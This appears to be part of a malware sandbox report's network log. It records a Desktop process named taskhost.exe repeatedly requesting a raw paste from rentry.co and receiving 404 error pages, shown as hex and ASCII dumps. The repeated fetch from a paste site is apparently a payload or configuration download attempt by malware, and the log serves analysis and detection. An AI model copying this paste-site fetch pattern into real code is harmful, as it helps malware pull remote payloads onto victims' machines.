                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjMi5qQhrnRArk4%2Bjapr95QF3tFFeNTTNJ3rQ4SuDhFR77xBl7%2B7DxZeHGZZicQCBVLkG%2FJ9LFLs%2FU5Sty0q%2B079RZqMIXW5%2FJQRtiY5gg8auxEg7vTlVCaNHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f156355ab91c331-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1649&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1770770&cwnd=79&unsent_bytes=0&cid=3b8c0c32577c3098&ts=806&x=0"
                                                              2024-12-13 10:49:32 UTC495INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:32 UTC1369INData Raw: 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://
                                                              2024-12-13 10:49:32 UTC1369INData Raw: 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62
                                                              Data Ascii: ).matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttrib
                                                              2024-12-13 10:49:32 UTC1227INData Raw: 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                                              Data Ascii: t mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.749850104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:36 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:37 UTC873INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:37 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWp5dp5s8Mg0j9oQd9rdFOwJwTVlP4LF%2By1SbFmsCuMWQOIuHtdKL7%2FD8EmmRdFkgxNeBL4kXPCt82lP%2Fzm56VCSGdt%2B2HzouN1co4fWIi1%2FaTBfQTmSOKfruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563750906de9a-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1921052&cwnd=209&unsent_bytes=0&cid=30b89b07403da010&ts=811&x=0"
                                                              2024-12-13 10:49:37 UTC496INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:37 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://r
                                                              2024-12-13 10:49:37 UTC1369INData Raw: 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75
                                                              Data Ascii: .matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribu
                                                              2024-12-13 10:49:37 UTC1225INData Raw: 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20
                                                              Data Ascii: mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:37 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                              Data Ascii: 1
                                                              2024-12-13 10:49:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.749861104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:41 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:42 UTC875INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:42 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VU9fcuE5u0TyThzOgaml8duM%2B%2Fc7VzwsECtxH5Y6xcIDIbrG1mtAOwgFeWeagLz5lO5VTGBrax2ulNNW%2FY2D%2F6eqLUb335BILLbaYZF%2BD4azJFyNoZu0tI%2FO4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563959ed90f46-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1638&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1782661&cwnd=226&unsent_bytes=0&cid=2bd371121d77cc32&ts=803&x=0"
                                                              2024-12-13 10:49:42 UTC494INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:42 UTC1369INData Raw: 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f
                                                              Data Ascii: > <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https:/
                                                              2024-12-13 10:49:42 UTC1369INData Raw: 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69
                                                              Data Ascii: ").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttri
                                                              2024-12-13 10:49:42 UTC1228INData Raw: 68 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20
                                                              Data Ascii: ht mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.749877104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:46 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:47 UTC871INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:47 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Iz2TKKguUpwpnC5geLPLprK83nehs0CCtrwdk1dHr3as%2F3%2FnaVGBQVSMXEmSvR4P%2FcDWIUbeLmFStpLOTdLPpAUVm%2Bbgy1f9tukTXErwCVPxPGvR689Jq1qjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563b4fd7e4295-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1795817&cwnd=252&unsent_bytes=0&cid=7fbc11b59a3f741b&ts=814&x=0"
                                                              2024-12-13 10:49:47 UTC498INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:47 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://ren
                                                              2024-12-13 10:49:47 UTC1369INData Raw: 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                              Data Ascii: atches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute
                                                              2024-12-13 10:49:47 UTC1224INData Raw: 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: ode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.749888104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:51 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:52 UTC873INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:52 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
